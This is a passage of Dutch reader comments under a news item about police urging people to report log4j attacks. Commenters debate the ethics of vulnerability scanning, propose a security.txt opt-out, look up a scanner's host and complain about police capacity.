Er mag natuurlijk ook gezocht worden naar sleutels onder bloempotten etc. etc. Het gaat immers om makkelijke issues aan te kaarten waarvan iedereen weet dat je ze "niet mogen gebruiken" ...
Wat te doen bij verrotte deuren... die zijn feitelijk ook niet afgesloten. ipv. van een foto zouden ze eigenlijk een brief aan iemand in het huishouden moeten zoeken en meenemen.

willyb @tweaknico • 25 december 2021 20:33

Als je langs mijn kantoor loopt en je ziet dat ik de sleutels in m'n deur heb gelaten, bel gerust even aan. Ik zal er blij mee zijn. Maar je mag niet aan de deur komen voelen, je mag niet binnen proberen te komen.

Het is goed om hier ethische discussies over te gaan voeren, tot waar mag je gaan, maar heb toch wel het gevoel dat DIVD aan de goede kant staat van het grijze gebied wat er nu is.

Aangifte doen lijkt mij in dat specifieke geval dan een verkeerd signaal. Dan zou je dat ook mogen doen tegen zowat elke test-website die er bestaat op het web: die testen immers ook vormen van beveiliging (toevallig nu nog geen log4j).

Maar misschien zouden we als IT-ers best in de standaard https://securitytxt.org een 'do nothing' kunnen toevoegen die de testers dan kunnen uitlezen.

Jim80 @Cergorach • 24 december 2021 13:58

Bedankt! Even niet aan gedacht, normaal ben ik de eerste om met lmgtfy te antwoorden

webfreakz.nl @Jim80 • 24 december 2021 17:16

Hostname "log4jdns.x00.it" resolved naar:

user@server:# host log4jdns.x00.it
log4jdns.x00.it has address 5.2.67.229

Whois:

inetnum: 5.2.67.0 - 5.2.67.255
netname: LITESERVER-DRN-VPS

role: Liteserver B.V. - NOC Department
address: Havinghastraat 32
address: 1817DA Alkmaar (The Netherlands)

Hmz, tekst en uitleg op https://info.x00.it/ , lijkt gewoon een pagina met platte tekst te zijn.

[Reactie gewijzigd door webfreakz.nl op 24 juli 2024 09:53]

StefanDingenout 24 december 2021 17:38

Oh, dus nu willen ze ineens IP adressen e.d. hebben. Maar als ik aangifte wil doen van een oplichter die via sms bezig is mag ik niet aangeven welk telefoonnummer ze gebruiken want dat is privacy schending... Make up your mind, politie...

Moortu 24 december 2021 21:29

Toen ik gescammed werd en de dader wist hebben ze besloten niet te onderzoeken omdat ze niet genoeg mensen hebben om alles te onderzoeken

Maar ze hebben wel capaciteit om log4j aanvallen te onderzoeken?

Op dit item kan niet meer gereageerd worden.

Politie roept op aangifte te doen van log4j-aanvallen

Lees meer

Reacties (82)

Sorteer op:

Weergave: